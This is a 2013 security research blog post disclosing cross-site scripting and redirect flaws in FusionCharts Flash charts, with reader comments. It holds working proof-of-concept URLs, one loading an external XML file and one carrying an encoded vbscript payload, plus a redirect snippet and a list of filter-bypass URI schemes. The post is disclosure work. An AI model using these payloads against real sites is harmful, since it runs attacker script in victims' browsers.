Tuesday, January 1, 2013

FusionChart 2013 Flash New Attacking Vectors

My Findings about FusionCharts Vulnerabilites:



A) I found that an attacker is able to execute a XSS attacks by loading a external XML File via dataUrl Parameter,

This Parameter looking for a valid configuration fie for display Graph Data in FusionChart,

In this case, An attacker is able to use the link parameter (http://docs.fusioncharts.com/charts/contents/DrillDown/LinkFormat.html) to execute javascript payloads on the client
for example (Click the Graph For XSS PoC):

http://nirgoldshlager.site50.net/Column3D.swf?dataURL=http://files.nirgoldshlager.com/Data.xml

When the victim will click on the malicious graph, The XSS Payload will be run on his client,



B) An attacker is able to perform redirection attack (New Tab) in Firefox, This can be done by using the LogoURL Parameter,

This Parameter allow to attacker loading a external swf file (swf),
To perform a Redirection attack, The attacker will use the req.send function in ActionScript and use his malicious swf file,

Req.send function:
(req.send("http://nirgoldshlager.com", "_blank", "GET");),

PoC:

http://nirgoldshlager.site50.net/Column3D.swf?dataURL=http://files.nirgoldshlager.com/Data.xml 

Solution:

Cross Domain Policy file:

http://www.adobe.com/devnet-docs/acrobatetk/tools/AppSec/CrossDomain_PolicyFile_Specification.pdf

What about anti-XSS Regex action script?

We all remember the old debugmode=1 Bug in FusionChart Right :)?

I have examined the fusionchart's action script and discovered they do perform a poor trial of blocking Cross site scripting attacks using regex to match dangerous XSS attempts

FusionChart action-script is trying to block the Dataurl=XXX XSS Attack  by using a poor regex that is only looking for javascript/asfunction keywords, don't let the colon ":" check to trick you ;) this check is only performed in case javascript/asfunction is detected.


Line 126-128:

function filterXSSChars(strURL)
{
    if (_isOnline == true && ((strURL.toLowerCase().indexOf("javascript") != -1 || strURL.toLowerCase().indexOf("asfunction") != -1) && (strURL.indexOf(":") != -1 || strURL.indexOf("%3A") != -1)))

An attacker is able to bypass this regex easily in IE by using vbscript instead of javascript,




PoC:

http://nirgoldshlager.site50.net/MSLinelatest.swf?debugMode=1&dataURL=%27%3E%3Ca%20href=%27vbscript:alert%286%29%27%3E%3Cfont%20size=%22100%22%20%3EClick%20Me%20For%20XSS%3C/font%3E%3C/a%3E%3C%3E


Also you can use data:text/html; to bypass it or mocha,livescript for older version in Netscape,

The correct solution might be:

asfunction|javascript|vbscript|data|mocha|livescript|feed|pcast (Thanks to @irsdl for the feed tip, And @Milad_Bahari for the pcast, (feed,pcast XSS Works on some older versions of Firefox)

 As discovered by security researcher "Ben Hayak"(@benhayak)
a new paramter(defaultDataFile) has been revealed which is vulnerable to new XSS Attack.

There is another parameter called defaultDataFile this parameter can be used to trigger another XSS incase the DataURL parameter is protected/blocked

Line 125:

var _defaultDataFile = unescape(getFirstValue(rootAttr.defaultdatafile, "Data.xml"));

We can use this parameter to execute a XSS attack,

2 comments:

ChUcHu said...

Good going :)

Correct typo `fie`

Zuk said...

Goldi, you're a champ!
Keep up the good work.

Zuk

Post a Comment